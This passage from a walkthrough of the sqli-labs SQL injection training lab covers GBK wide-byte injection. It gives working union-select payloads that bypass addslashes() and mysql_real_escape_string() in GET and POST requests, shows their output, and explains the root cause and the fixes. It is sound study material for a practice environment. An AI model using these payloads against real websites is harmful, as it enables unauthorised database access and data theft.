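def quote_still_escaped(query: bytes, charset: str) -> bool:
    """True when the injected quote still carries its backslash after decoding."""
    return "\\'" in as_seen_by_mysql(query, charset)


if __name__ == "__main__":
    print(as_seen_by_mysql(build_query(PAYLOAD), "gbk"))
    print(as_seen_by_mysql(build_query(PAYLOAD), "utf-8"))
```

The fix is not a better escaping routine applied to bytes: the client library has to know the connection charset (mysql_set_charset() in PHP, not a SET NAMES query), or the application should use a charset without this property such as utf8mb4, and ideally bind parameters instead of escaping at all.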

Less-33 Bypass addslashes() #

Same as the previous lesson.

Less-34 POST - Bypass addslashes() #

POST version. Note that URL-encoding %df a second time turns it into %25df (the % itself gets encoded), so send the raw bytes with HackBar's raw mode or by editing the request in Burp Suite.

uname=zqq%df' union select 1,2 --+&passwd=123&submit=Submit

Less-35 why care for addslashes() - Integer based #

Integer-based: no single quote is needed to close the query, so addslashes() offers no protection here.

Less-35/?id=-1 union select 1,2,3 
Your Login name:2
Your Password:3

Less-36 Bypass mysql_real_escape_string #

This function escapes the same characters as addslashes() but also takes MySQL-specific issues into account, such as certain multibyte-character attacks. mysql_real_escape_string() needs an active connection because it escapes according to the connection's current character set; it only helps if the client library knows that charset (set with mysql_set_charset()), and a charset changed through a SET NAMES query is invisible to it, which is why the same %df' payload still works here. mysql_real_escape_string() belongs to the deprecated mysql extension and should not be used in new PHP code; addslashes() is still valid for general PHP use but is not suitable for escaping data destined for SQL.

Less-36/?id=-1%df' union select 1,2,3 --+
Your Login name:2
Your Password:3

# The rest is the same as above

Less-37 POST - Bypass mysql_real_escape_string #

POST version.

uname=zqq%df' union select 1,2 --+&passwd=123&submit=Submit
Your Login name:1
Your Password:2

# The rest is the same as above

Page-3 (Stacked Injections) #

TODO

Page-4 (Challenges) #

TODO